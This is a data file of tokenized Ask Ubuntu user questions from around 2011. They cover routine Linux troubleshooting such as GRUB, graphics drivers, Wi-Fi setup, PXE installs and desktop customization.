89504	can someone tell me what gtk+ theme this is ?	i found this screenshot : can someone tell me what gtk+ theme this is ?
89505	fast way to create gui for bash app	i want to build a simple gui for an app that use bash so for example clicking on a button would execute some bash commands and so one . there 's a gui creator also simple , i need only buttons and textareas that does n't require to learn a new programming launguage ?
89507	how can i choose which gpu to use from grub using vgaswitcheroo ?	i have a notebook with switchable amd/intel graphics . i use , successfully , vgaswitcheroo to choose the active gpu and disable the unused one by a script in rc.local . however , i would like to be able to choose the active gpu at startup , ideally by a different grub entry for each gpu . is there a way of doing this ?
89510	do i need an ubuntu certification to teach ubuntu	i have several students that want a course of ubuntu . i would like to know the following very important points : do i need an ubuntu certification to certified my students afterwards that they know ubuntu . can i use the ubuntu logo , an ubuntu symbol for the certificate that i would give out ? do i need permissions ? where should i ask for permission ? is this possible ? is there an ubuntu certificate format available that i could use ? is there a site where i could sign to teach and promote ubuntu to new users ( become an ubuntu teacher ) ? what information and permissions might i need from ubuntu or canonical if i wanted to give courses about ubuntu ?
89518	upstart script and start-stop-daemon	i had an issue where making an upstart script would call the script multiple times , causing my ircd to spawn around 8 times or so . in order to rectify this , i used start-stop-daemon : description `` irc daemon upstart script '' start on startup start on runlevel [ 2345 ] stop on runlevel [ 016 ] respawn nice -5 exec start-stop-daemon -- start -- chuid ircuser -- chdir /home/ircuser/inspircd/run -- exec /home/ircuser/inspircd/run/bin/inspircd -- -- config=/home/ircuser/inspircd/run/conf/inspircd.conf this works exactly like i want it to , except that : stop ircd says that it stops it , but inspircd is still running afterwards . is there a better way than using start-stop-daemon that will stop the script from opening 8 instances , or is there some way i can make it compatible with the start-stop-daemon ?
89521	how to download a driver when you ca n't boot ?	can someone please tell me how to download a driver to fix ubuntu 11.10 graphic driver problem ( radeon hd 6470 ) if i cant boot ubuntu . i can not set to acces with graphic commands so i am hoping i can download and run the driver to fix . thanks for any help tony thanks everybody for the suggestions i think i should give some further infomation . i think loading latest driver would be worth trying however from my login can someone explain if for instance i were to download the latest driver what command is needed to fetch the driver from say a pendrive ? also i ran startx and had a report 'failed to load fgirx ( module does not exist,0 ) is that relevant . sound like its worth a try to install latest linux driver from ati but can someone give me the commands to use to get to pendrive and run from my antony @ antony-305v4a-305v4a : etc or how to move the driver on pendrive to home folder ? etc . note : if i try to run sudo apt-get install fglrx -installer ... ... it tells me unable to locate fglrx -installer if i write sudo mount -t vfat /dev/sdb /mnt ( where sdb is the flash ) i get fat-fs ( sdb ) : bogus number on reserved sectors mount : wrong fs type , bad option , bad superblock on /dev/sdb , missing codepage or helper program , or other error . have formatted the flash to fat and again copied driver on . need to update ati driver as can not boot 11.10 any ideas thanks
89522	grub installation fatal error in ubuntu 11.10 installation	i have winxp and win7 on my hd and have just installed the ubuntu 11.10 desktop on the hd too.i decided to install boot files on a /boot partition and also install grub not at the mbr and install easybcd as a bootloader manager in win7 . here 's my hard disk partitions : /dev/sda1 winxp ( ntfs ) /dev/sda5 win7 ( ntfs ) /dev/sda6 my other ntfs partition /dev/sda7 /boot /dev/sda8 swap /dev/sda9 / an i select /dev/sda7 as device for boot loader installation . i followed steps from this article : http : //www.linuxbsdos.com/2011/05/22/how-to-dual-boot-windows-7-and-ubuntu-11-04/ but i get a fatal error on installing grub at the final step of ubuntu installation that said : unable to install grub in /dev/sda7 executing 'grub-install/dev/sda7 ' failed this is fatal error how can i solve it ? should i reinstall ubuntu or just reinstall grub ? is it a bug of ubuntu 11.10 ? can i reinstall grub from a knoppix live cd ? i do n't have ubuntu live cd . thank you for helping .
89525	how do i disable file sorting on usb drives ?	are there any file managers that allow unsorted folders on usb drives ? i can select manual sort on my hard drives fine , but when i connect a usb mass storage device the option for manual sort is gone and everything is sorted by name by default . i need to sort while in list or compact view . it turns out that the reason i can sort manually on my other drives is because they are in icon view . this does n't help on my usb mp3 player because if i manually sort the files as icons they just default to whatever sorting is set for list view on the usb mass storage mp3 player . the only way i 've found to get around this is to us windows xp to manually sort the files . i 've now tried thunar , pcman file manager , dolphin , xfe , krusader , tux commander , and gnome commander . i ca n't seem to sort manually in list or compact view in any of these . maybe i 'm missing the setting to disable automatic sorting ?
89534	how to lock my screen ?	i ca n't enable lock screen mode in my laptop and also in my pc . i went to system setting > screen > lock ctrl+alt+l : nothing happens ! the shortcut is there but not works ! sudo apt-get -- reinstall install gnome-screensaver : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : dassault-systemes-draftsight : i386 : depends : sendmail : i386 but it is not installable predepends : libdirectfb-extra : i386 ( > = 1.2.7-2 ) but it is not going to be installed predepends : libxcb-render-util0 : i386 ( > = 0.3.6-1 ) but it is not installable e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
89537	how can i get information about a folder ?	someone copied a folder contains many video files to my laptop . i 'd like to know when he copied them and some other information like this . i think accessed date and modified date are not always right ! please help me !
89538	why `` df -h `` does not show the root mount , but multiple repetitive entries ?	the system is ubuntu 10.04 running on a openvz vps here is the output : root @ s01 : ~ # df -h filesystem size used avail use % mounted on varrun 256m 20k 256m 1 % /var/run varlock 256m 0 256m 0 % /var/lock varrun 256m 20k 256m 1 % /var/run varlock 256m 0 256m 0 % /var/lock varrun 256m 20k 256m 1 % /var/run varlock 256m 0 256m 0 % /var/lock varrun 256m 20k 256m 1 % /var/run varlock 256m 0 256m 0 % /var/lock varrun 256m 20k 256m 1 % /var/run varlock 256m 0 256m 0 % /var/loc root @ s01 : ~ #
89542	how to build the mainline kernel source package ?	ubuntu kernel ppa only provides linux-headers*.deb and linux-image*.deb packages . how can i build the corresponding linux-source*.deb package ? context : i 'm currently running ubuntu 11.10 with the mainline kernel ( 3.2 rc6 now ) to get a better support for my sandybridge igp ( dell e6420 laptop with intel i5-2520m cpu ) . appears , i 'd like to install this touchpad driver , alps touchpads being badly supported ( see previous link bug report ) , while waiting for upstream support in kernel version 3.3 . problem is , dkms keeps complaining about not finding the full kernel source : module build for the currently running kernel was skipped since the kernel source for this kernel does not seem to be installed . appears i may not need the full source but i 'd still like to try having it installed to see if it solve my problem . what i tried : uncompressing the kernel.org source archive in /usr/src/ . dkms still complaining . manually updating the kernel source package with uupdate and the mainline source package like explained here . did not succeed . manually building the linux-source package following @ roadmr and @ elmicha instructions . i eventually succeeded to build it but dkms still complained about the missing source . at last i noticed an error i did not catch in the first place while reinstalling the kernel headers . appears the .deb i got may have been corrupted , downloading it again did the trick : ) alas , while dkms agreed to compile the module i ran into the following error which appears to have already been reported . this issue is n't yet solved but i wo n't try to because of the following : in the end i decided to test the precise kernel version 3.2-rc6 through the xorg-edgers ppa which appears to be correctly patched : it works . nevertheless , it might still be of some interest to know how to build the mainline linux-source package as the ubuntu kernel team does n't provide it . not to mention that i learned a lot in the process ^^
89543	how do i wipe swap on a fully encrypted disk ?	i installed ubuntu 11.10 using the alternative cd and all installed well . for security reasons , i want to be able to wipe the swap of this machine on a regular basis . i installed secure-delete tools . now i want to use sswap . but to do so , i need to disable my swap . how to i go about doing this , and are there any other tips on how to achieve the wiping of the machine 's swap of a full encrypted harddisk .
89545	stuck in window resize on resume	sometimes if i unlock ubuntu and happen to have a window focused it will be partially off-screen with these orange circles holding white arrows on the window . my default assumption is that they 're some sort of resizing/move function ( given placement and style ) , but i ca n't seem to do anything with them or make them go away . when this happens i can : alt+tab ( and change focus but not bring the window in front of mozilla / hide mozilla ) and alt+f4 out of mozilla ( but not give me back control - i 'm stuck with the moving hand mouse ) . i ca n't seem to get back general control without a hard reboot ( that is , no keyboard or mouse input is accepted ) . how can i avoid this ? is there a key combination to get out of this mode ? or am i stuck closing firefox every time i lock my computer ? i 've tried using alt+f8 and alt+f7 , but neither of those fixes the error . using them normally also does n't reproduce the orange circle white arrows thing i see when this breaks . for reference i just updated to 11.10 two days ago and this problem never occurred before . edit : i 've now had this happen with skype replacing firefox in all particulars . edit 2 : and most recently it happened with gedit . from what i can tell the only times it has n't happened is when i 'm focused on a workspace that is a ) empty or b ) covered by full screen something . edit 3 : as far as i can tell this occurs for any application not in full screen mode , provided i have the workspace they are in active .
89546	adding radio stations to banshee from m3u files	so i can get banshee to play wgbh 995 classical new england ( http : //www.wgbh.org/995/ ) by downloading the m3u file ( http : //streams.wgbh.org/streamb/classical.m3u ) and telling firefox to open the file in banshee . but i want to save the radio station in my library . the file classical.m3u has the following contents : # extm3u http : //streams.wgbh.org:8006/ so i bring up the `` add new radio station '' dialog box and put http : //streams.wgbh.org:8006/ in for the `` stream url : '' . when i double click the resulting entry in the radio station list , banshee goes to `` contacting ... '' and then back to `` idle . '' what gives ? i 'm using banshee 2.2.1 , and am behind a proxy server , but it works when it opens the m3u file , so it must be configured to use the proxy .
89549	is it normal for aptitude to automatically remove packages during an installation ?	usually i install via apt-get or software center . for secure delete tools , i installed using aptitude . sudo aptitude install secure-delete aptitude however , removed a whole bunch of packages . the following packages will be removed : removing libasound2-plugins : i386 ... removing libasound2 : i386 ... removing libpulse0 : i386 ... removing libasyncns0 : i386 ... removing nspluginwrapper ... removing nspluginviewer : i386 ... removing libgtk2.0-0 : i386 ... removing libatk1.0-0 : i386 ... removing libpango1.0-0 : i386 ... removing libcairo2 : i386 ... removing libthai0 : i386 ... removing libdatrie1 : i386 ... removing libsndfile1 : i386 ... removing libflac8 : i386 ... removing libgdk-pixbuf2.0-0 : i386 ... removing libjack-jackd2-0 : i386 ... removing libjasper1 : i386 ... removing libjson0 : i386 ... removing libnspr4-0d : i386 ... removing libnss3-1d : i386 ... removing libvorbisenc2 : i386 ... removing libvorbis0a : i386 ... removing libogg0 : i386 ... removing libpixman-1-0 : i386 ... removing libsamplerate0 : i386 ... removing libspeexdsp1 : i386 ... removing libwrap0 : i386 ... removing libxcb-render0 : i386 ... removing libxcb-shm0 : i386 ... removing libxcomposite1 : i386 ... removing libxcursor1 : i386 ... removing libxft2 : i386 ... removing libxinerama1 : i386 ... removing libxrandr2 : i386 ... but i did not put in a command for removing packages . is this normal ? could i have lost dependences from this , or does aptitude check whether these packages are not depended on . how can i check if any of the software on my computer has missing dependencies ?
89553	hard disk icon disappears after mounting	i installed ubuntu 11.10 . during installation , i created the default user ( named ms ) . i can browse/edit and do anything in my hard disk ( i have 7 partitions ) . today i created a new user named ( abc ) , this user can not access my internal hard disk partitions . when i click on each partition the hard disk icon suddenly disappear from the left side device panel ( inside home folder there is things like devices , bookmarks etc ) . so i checked /media directory and it says `` folder contents can not be displayed '' . cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=9fa65e41-5c75-4636-a3b5-961739b245c2 / ext4 errors=remount-ro 0 1 fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000b2307 device boot start end blocks id system /dev/sda1 2048 39997439 19997696 83 linux /dev/sda2 * 39999488 81946623 20973568 83 linux /dev/sda3 81947565 123877214 20964825 83 linux /dev/sda4 123887614 976773119 426442753 5 extended /dev/sda5 123887616 333602815 104857600 83 linux /dev/sda6 333604864 543320063 104857600 83 linux /dev/sda7 543322112 753037311 104857600 83 linux /dev/sda8 753039360 976773119 111866880 83 linux information about the users id ms uid=1000 ( ms ) gid=1000 ( ms ) groups=1000 ( ms ) ,4 ( adm ) ,20 ( dialout ) ,24 ( cdrom ) ,46 ( plugdev ) ,116 ( lpadmin ) ,118 ( admin ) ,124 ( sambashare ) id abc uid=1002 ( abc ) gid=1002 ( abc ) groups=1002 ( abc ) ,4 ( adm ) ,20 ( dialout ) ,24 ( cdrom ) ,46 ( plugdev ) ,116 ( lpadmin ) ,118 ( admin ) ,124 ( sambashare ) also i got the following things while mounting the partition under the user abc . dec 21 23:04:15 ms-lenovo-g550 kernel : [ 64.093923 ] ext4-fs ( sda8 ) : warning : maximal mount count reached , running e2fsck is recommended dec 21 23:04:15 ms-lenovo-g550 kernel : [ 64.095606 ] ext4-fs ( sda8 ) : recovery complete dec 21 23:04:15 ms-lenovo-g550 kernel : [ 64.095611 ] ext4-fs ( sda8 ) : mounted filesystem with ordered data mode . opts : ( null ) dec 21 23:04:16 ms-lenovo-g550 kernel : [ 65.619595 ] ext4-fs ( sda7 ) : recovery complete dec 21 23:04:16 ms-lenovo-g550 kernel : [ 65.619602 ] ext4-fs ( sda7 ) : mounted filesystem with ordered data mode . opts : ( null ) dec 21 23:04:17 ms-lenovo-g550 kernel : [ 66.250818 ] ext4-fs ( sda6 ) : warning : maximal mount count reached , running e2fsck is recommended dec 21 23:04:17 ms-lenovo-g550 kernel : [ 66.251195 ] ext4-fs ( sda6 ) : recovery complete dec 21 23:04:17 ms-lenovo-g550 kernel : [ 66.251362 ] ext4-fs ( sda6 ) : mounted filesystem with ordered data mode . opts : ( null ) dec 21 23:04:18 ms-lenovo-g550 kernel : [ 67.080910 ] ext4-fs ( sda5 ) : recovery complete dec 21 23:04:18 ms-lenovo-g550 kernel : [ 67.080916 ] ext4-fs ( sda5 ) : mounted filesystem with ordered data mode . opts : ( null ) here are the result of /media after mounting partitions . abc @ ms-lenovo-g550 : ~ $ ls -al /media/ total 28 drwxr-xr-x 7 root root 4096 2011-12-29 07:34 . drwxr-xr-x 24 root root 4096 2011-12-11 22:30 .. drwxrw -- -- 6 ms ms 4096 2011-11-19 15:45 films drwx -- -- -- 17 ms ms 4096 2011-12-22 21:59 misc dr-x -- -- -- 9 ms ms 4096 2011-12-20 23:18 ms drwx -- -- -- 6 ms ms 4096 2011-12-28 18:50 softs drwx -- -- -- 6 ms ms 4096 2011-11-17 03:06 song also different partitions are used to arrange things in an easy manner . thanks , vipin ms
89554	troubleshooting wlan , essential wlan debugging information ?	my wlan does not get connected , only showing networks , but internet connection works only with rj45 . i am hoping for some sort of summary answer to solve this kind of problems in a generic way . i have listed below some command that may help to solve the problem . yes , i try to solve the current problem at hand but i would also like to know the essential commands to debug this kind of probs in the future . % ls debugwlan.sh specs % cat debugwlan.sh > specs % ./debugwlan.sh > > specs pci ( sysfs ) % cat specs cat /etc/lsb-release sudo rfkill list all sudo lshw -class network distrib_id=ubuntu distrib_release=11.10 distrib_codename=oneiric distrib_description= '' ubuntu 11.10 '' 0 : phy0 : wireless lan soft blocked : yes hard blocked : no *-network description : ethernet interface product : 82573l gigabit ethernet controller vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 00 serial : 00:16 : d3:34:05:88 size : 100mbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=1.3.10-k2 duplex=full firmware=0.5-1 ip=192.168.1.118 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:46 memory : ee000000-ee01ffff ioport:2000 ( size=32 ) *-network disabled description : wireless interface product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan6 version : 02 serial : 00:1f:3c : c3 : a3:95 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl3945 driverversion=3.0.0-14-generic firmware=15.32.2.9 latency=0 link=no multicast=yes wireless=ieee 802.11abg resources : irq:45 memory : edf00000-edf00fff threads maybe with relevant information '' siocsifflags : operation not possible due to rf-kill '' ?
89556	getting java working again in 10.10 ? ( or force newest version of openjdk ? )	recently , the games on pogo.com stopped working with sun java in ubuntu 10.10 . i have my dad running 64bit ubuntu 10.10 because it works fine for him and he has had no reason for an upgrade ( and didnt like unity ) . he loves pogo and plays the slots games on there regularly . ive had sun java 6 installed and all worked fine until recently . i attempted an upgrade to the new oracle java but pogo games still dont work . pogo games have historically not worked with openjdk and icedtea , but i notice they ( the pogo games ) work great ( and fast ) on ubuntu 11.10 with the newest versions of openjdk/icedtea . ive attempted to install an openjdk ppa for 10.10 but it does not make use of the newest versions that are available in 11.10 . i am looking for any tips on what i can do next . any help completely appreciated ! my options i see available to me right now are : force install of newest openjdk somehow on 10.10 try installing firefox & sun java in wine and see if pogo games work there . upgrade his computer to 11.10
89559	why is my dvd drive `` /dev/dvd1 '' instead of `` /dev/dvd '' ?	i rarely use dvd 's , so i just noticed that vlc could n't find the drive ( as /dev/dvd ) . looking into /dev folder , /dev/dvd1 and /dev/dvdrw1 and /dev/cdrom1 exist . i never had a second dvd drive in there , so my question is : how did that happen ? what is responsible for assigning those devicenames ?
89565	best place to learn ubuntu linux for a windows programmer newbie	i am a programmer , i developed in c/c++/c # .net , java , html and matlab most of my work was in c # and .net framework generally i recently switched to try linux for 2 months as exploration , i want to know how to really get into linux and develop for it . i am new to all the terminal/shell commands and stuff like that so you can get the idea
89567	how to import chromium browser-data to chrome	in chrome under settings - > personal stuff , i am given the option to 'import data from another browser.. ' . however chromium is not displayed as an option ... is the only way to do this to sync with my google account ? is there an offline way to copy over the data ? or a workaround that does not require i have a google account to sync to ?
89568	identify which chrome tab is using up cpu ?	i sometimes have a bunch of tabs opened in google chrome , which i believe creates a new process per tab . i would like to be able to pinpoint the tab that is using up the cpu . is there an easy way to to that ?
89574	i have 10 pc 's of which i want to set up a centralised ubuntu server	i am new to the ubuntu server scene and have been an ubuntu fan for 2 years using it only as a standalone desktop client . i would like to use the server as a place to hold all roaming profiles and use ubuntu client machines to connect to it . also i would like to run the ubuntu server as a file server and mysql database . i have been reading about openldap and have also given it a go at installing on the server . after the 3rd attempt i got it going . but got stuck when i go to the client setup . is there an easy to use gui solution to setup ubuntu server for small business and have clients connected to it . aside from ubuntu i have a windows server that is used for accounting and i would like to run winxp in a virtualbox as sage 200 is not get working on wine . unless someone knows of a way to get it working . what do i need to install on my ubuntu server to from a fresh install to make it work for my business ? and in what order do i have to set things up . a gui would be good .
89576	how do i add a document shortcut to the unity panel ?	in gnome 2 , i used to be able to drag a particular document , for example , my_to_do_list.txt to the panel . it was quick access to my daily to do list , which opened up in gedit . this is the same case for when i want to add bash scripts to the unity launcher , but they opened up either in a terminal or simply loaded . now things seem a little harder with adding document short cuts to the unity panel launcher . i 've seen howtos for this , however , when i right click on my desktop , there is no option to create launcher . only to create a new folder , or a new empty file . are there any really quick ways to make document shortcuts in the unity launcher ? will ubuntu be bringing in a simpler method to make document short cuts ?
89584	installer looks for a cd while attempting a network install via pxe/nfs	i 'm trying to set up a pxe/nfs server which will automatically deploy ubuntu 10.04 server ( 32-bit ) , now i 've set up dhcp and tftp and the client loads the bootloader from the pxe server . now i choose to install ubuntu ( through nfs ) and the first thing what happens is that it checks the cd-drive and the installation gets canceled because of the installer complaining that the cd is wrong . now what should i do ? i have to say that when tried this with ubuntu desktop this worked pretty good . edit : i 've tried this with ubuntu 32 bit server 11.10 and this bug does not occure , the problem is that i really need to deploy 10.04 because of the long time support edit 2 : probably the wrong initrd or kernel image that was it ... consider this one closed
89585	customizing gnome layout in ubuntu 11.10	i recently upgraded my 11.04 to 11.10 and unity took me by surprise . i quickly switched to 'gnome ' through the login screen , but i 'm faced with some difficulties customizing it . right click does n't do anything when i click either the task bar , or the application launcher at the top . i do n't seem to have any application launcher except for the dropdown 'applications ' menu . i am using ubuntu in a virtualbox environment , so prefer a 2d theme . how can i do the following : combine launcher and task bar into a single bar at the bottom of the screen double task bar size ( and preferably also icons ) provide a launcher on the task bar ( essentially , i 'm looking for a windows 7 style task bar if something like that exists ? )
89587	ubuntu software center search only returns magazines	no matter what i search for in ubuntu software centre , the only search results are magazines . i 'm searching from the top level category . if i browse the categories manually ( graphics- > 3d for example ) , it shows no results . i can install and search for software in synaptic without issues . i 've run sudo apt-get update from the terminal , it does n't report any issues . is this likely to be a bug ? i 'm using ubuntu 10.10 . screenshot :
89593	how can i compile shotwell to be able to use the faces feature ?	it seems shotwell has the capability , you just have to compile it . i tried to configure with -- define=enable_faces but the feature is n't showing up . i used playya git which included a recent fix for a compile faces error .
89595	uninstalling ubuntu when it is on the windows partition	i partitioned my hard drive in order to install ubuntu on one half and have windows 7 on the other . however , when i went to install ubuntu , i selected install alongside windows 7 thinking it would give me the option to select a partition to install it to and it did not . it , apparently , just installed it on the partition with windows 7 . from what i have found about uninstalling ubuntu , i should see a partition created by ubuntu on the drive and i do not . *note : the ubuntu ( u : ) partition is the one i created to install ubuntu , it does not actually have ubuntu installed , note that the partition is empty .
89597	how do i move the weather indicator to the top-panel in gnome-shell	i 'm having a really annoying problem ! i just ca n't move an extension ( weather indicator ) from bottom panel to top panel ! ! i would really appreciate if someone helped !
89599	no proper resolution settings on my asus x53s ( nvidia/intel )	i have an asus x53s on which i 've installed ubuntu 10.11 . i have read several threads about the optimus feature using dual gpus ( integrated intel and dedicated nvidia ) and i have also installed both bumblebee and the proprietary nvidia driver but still i am not able to neither run nvidia-config or having a proper resolution setting menu . any suggestions ? the resolution i have is 1366 x 768 ( 16:9 ) and it is `` fixed '' , i.e . i have no other options to set , and this goes for the case when i do n't have an external display connected as well . i tagged it as hdmi since this is the interface used for my external display and there i would need to be able to set a higher resolution , else the output is quite poor .
89602	ubuntu one music showing 'unknown artist ' and 'unknown album ' for most songs	i successfully uploaded 23gb of music from my hard drive ( after lots of waiting ) to ubuntu one except that only ~20 artists/albums are showing up correctly and the rest are 'unknown ' . they are ( almost ) all mp3 files and the correct info shows up when loaded into a media player , including rhythmbox and banshee . thus , this is not a problem with the files themselves ( info also shows up correctly under properties- > audio in nautilus ) but rather a problem with u1 . there seems to be other threads with this issue but no answers , except for the excuse : `` ubuntu one does not currently support m4a files '' which is clearly not the issue . this is of particular concern for streaming to my iphone since all the music is disorganized , which really defeats the whole purpose of the app . i should note that most song titles are correct ( except may contain a song number in front of them ) which from what i understand is due to the fact that generally the file name is the song name . any help with this is greatly appreciated .
89603	english for terminal , spanish for everything else	when i open the terminal it 's difficult to write `` | '' or `` ~ '' ( keyboard layout is in spanish by default ) . i know how to change the keyboard layout to a different language , and to have a different language for different applications . so every time i open the terminal almost always i have to change the keyboard layout . ( well it is not very difficult > move mouse to top panel and then click the keyboard icon , and finally click on english ) it would be better if every time i open the terminal , by default , i could write in english . there is a way to do that ?
89606	gnome-terminal does n't refresh	gnome-terminal works just fine when i am running unity , but when i run gnome shell , terminals do n't work properly and have to be constantly refreshed . this is particularly annoying when using `` vi '' to edit text files . in the old , old days , i saw problems like this when the `` .profile '' file did n't have the correct setting for term . but i thought that modern distributions had pretty much solved this issue . in anyone else seeing this behavior ? hard to believe that it 's only me with this problem . for what it 's worth , i have this issue on every one of my four ubuntu 11.10 installations , so i know it 's not a hardware issue .
89607	logitech webcam makes usb drives unaccessable	recently i purchased a logitech webcam hdc310 camera . when i plug the camera into my computer/computers ( they all run ubuntu ... the first one is 10.04lts and the second is 11.10 ) the camera works perfectly along with the microphone . the issue arises when i go to plug in a usb flash drive . when i plug it in , nothing happens , and it does n't even recognize the device . when i unplug the webcam and plug the usb drive in , the computer can recognize the usb drive . apperently there is some issue with the driver ? ? ? anyone have a similar issue or a fix ? it would be semi inconvienent to have to always unplug the camera . thanks !
89608	how to sync tasks between ubuntu and android ?	i was using first tasque and then gtg on ubuntu and astrid on android with remember the milk as the backend . recently , astrid has dropped support for remember the milk , and both tasque and gtg 's support for syncing with rtm has always left something to be desired . so i 'm looking for a new solution , and i 'm open to leaving rtm especially if it is for something that is n't proprietary . what have you found to keep your tasks lists in-sync between ubuntu and android ? in particular , i 'm looking for a desktop based program on the ubuntu side rather than something in the browser . astrid has treated me well , but i would n't mind trying something else . currently , it can sync with astrid.com , google tasks , and producteev . anyone know of a desktop app that supports any of those ?
89612	how to tell ubuntu 11.10 not to set screen brightness to 100 % after each reboot ?	after each reboot , ubuntu sets the screen to full brightness . i have to manually adjust the screen brightness each time i reboot . this is annoying . how can i fix it ?
89613	custom dvorak layout not working	i 'm using lubuntu oneiric and ( trying to use ) a custom uk dvorak keyboard layout . i edited ( possibly not the best method , i know ) the file /usr/share/x11/xkb/symbols/gb to customise the uk version of dvorak there in order to include some characters that i want to be able to use . the old version of dvorak does not exist in that file anymore ; i overwrote it ( i did back it up in a separate folder ) . upon startup , lubuntu somehow manages to load the old and supposedly non-existent version of uk dvorak and not my customised layout . using setxkbmap gb -variant dvorak also does not load my version . i 'd like to point out that the file gb is not changed at startup and still always contains my layout . going onto lxkeymap in the lubuntu preferences tells me that my current keymap is gb ( dvorak ) , as it should be . clicking on english ( uk , dvorak ) ( in lxkeymap ) and clicking apply loads my version of the keyboard and then says that my current keymap is , surprisingly , gb ( dvorak ) again : that is , unchanged . if i then use setxkbmap gb -variant dvorak again , it reverts to the layout that should n't exist . i do not understand what is happening . i would rather not have to open lxkeymap to change my layout at startup every time . what is lxkeymap doing that succeeds in changing my layout that setxkbmap is not ? furthermore , how is this phantom layout being used ?
89615	how do i install llvm/clang 3.0 ?	so llvm 3.0 has been released , and i’d like to use it on my ubuntu 11.10 system . on the llvm download page , there are tarballs for llvm+clang 3.0 built for ubuntu 11.10 ( and 11.04 , and other systems ) in x86 & x86_64 flavors . i see that 12.04 will have llmv 3.0 from the package manager , but there do not seem to be any ppas with the new version for older ubuntu releases , nor is 3.0 available in the back-ports . i could , i suppose , unpack the tarballs into /usr/local , and then remove it if/when “offical” back-ports become available , but is that my best option ?
89619	an unhandleable error occurred	ubuntu 11.10 software centre error title : an unhandlable error occured error body : there seems to be a programming error in aptdaemon , the software that allows you to install/remove software and to perform other package management related tasks . details : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 968 , in simulate trans.unauthenticated = self._simulate_helper ( trans ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1092 , in _simulate_helper return depends , self._cache.required_download , \ file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 235 , in required_download pm.get_archives ( fetcher , self._list , self._records ) systemerror : e : i was n't able to locate a file for the ttf-mscorefonts-installer package . this might mean you need to manually fix this package . what should i do ? sorry if this has been posted before .
89622	how can clementine music player put my music playlists on my android phone ?	i 'm using clementine music player and love it . i 'm running the latest version of ubuntu , have a motorola atrix , and am running playerpro on my phone , but will switch to another player easily . i can easily sync my songs onto my microsd card with banshee and clementine , but i ca n't sync playlists onto it with clementine . any help ?
89623	how do i mount a motorola droid bionic ?	i have 11.10 running on a virtual machine on my macbook pro . i tried to connect my motorola droid bionic via usb , but ubuntu is not finding it ( or i can not find the mounted device ) . i am new to ubuntu , any help ? i am sure i am missing something easy .
89629	nikon p7100 does n't connect as a mass storage device	i 've tried connecting a nikon p7100 camera to a usb-port on two different laptops running ubuntu 10.04 and 11.04 but nothing happens . the camera says it 's got mtp/ptp protocol . so it does n't work as a mass storage device it seems . i can find no setting for changing the mode in the camera . lsusb gives : bus 002 device 007 : id 04b0:018b nikon corp. is it possible to mount this camera somehow ?
89630	pidgin menus do n't show up , neither in the application or the global menu	i installed pidgin as it has a great add-on for office communicator that works really well ... however i ca n't add any new contacts because there 's no menu ! i can open the `` buddy list '' and it shows my previously added buddies with no problem . but there 's no menus to add accounts , buddies etc . no global menu either ( in notification bar as happens normally with other applications ) . i 'm wondering whether it has anything to do with my dual-screen setup , but if i mirror the displays - no change . i 'm using 11.10 , in dual-screen mode , 2d ( not enough memory for 3d )
89636	how to maintain wpa connection on reboots when connecting from terminal ?	today i installed ubuntu server , and connected to my wireless by following this steps : $ ifconfig wlan0 up $ sudo /etc/init.d/networking stop $ wpa_passphrase `` ssid '' `` password '' > wpaconfig $ sudo wpa_supplicant -iwlan0 -cwpaconfig press ctrl+z $ bg $ sudo dhclient wlan0 credits for this instructions goes to this site . i am able to connect , but on reboot i have to repeat all the steps , even though it is simple and straightforward , i would prefer if i could connect automatically . how can i achieve this ?
89638	how to completely uninstall and reinstall firefox ?	how can i completely uninstall firefox , then re-install ? my brothers firefox icon is just blank for some reason on the unity sidebar . it launches but the icon is completely blank nothing there . if i uninstall this for him and then re-install will it work ? please help . i want to get this fixed for him .
89643	ubuntu on mac for dummies ?	i like ubuntu on my pc but i tried many times to install on mac in vain . it is too complicated and too many technical stuff for me . i like to see easy install on mac , like wubi . is there anyway around to painlessly install linux on mac ?
89645	why are all my programs closed when i resume from sleep ?	i have recently come across a problem on my ubuntu 11.10 laptop ( hp dv7 ) that , when resuming from sleep mode , all of my programs ( typically firefox and emacs ) are closed . why is it doing this and how can i stop it ?
89646	how can i set the installer to use my nfs server instead of a mirror while pxe installing ?	i 'm trying to deploy ubuntuer-10.04 server with a pxe server . now the problem i 've encountered is that the netboot initrd/kernel image wants to load ubuntu through a mirror and not through my nfs server . how can i change that to make the installer get the distro through nfs or tftp or whatever from my local server ? and i 'm using preseed which i 've put in my initrd . now it is important to note that i want to install ubuntu server , not to boot it or something similar , and i use a preseeding file . i 'm currently using a modified netboot initrd where i 've put my preseeding file in . i 've tried the method with netboot=nfs and nfsroot=ipofmyserver : /location/of/my/image/unpacked and this did n't work ( worked with ubuntu desktop and it booted but i want to install ubuntu server here ) . the problem i have is that the installer keeps aksing for a mirror site and does n't get the files from my local server
89651	no `` are you sure you want to delete this file ? '' message ?	one thing i really hate about ubuntu is how easy it is to accidentally delete files . is there any way to show a pop-up confirmation dialog when the delete key is pressed , before a file is actually moved to the trash ?
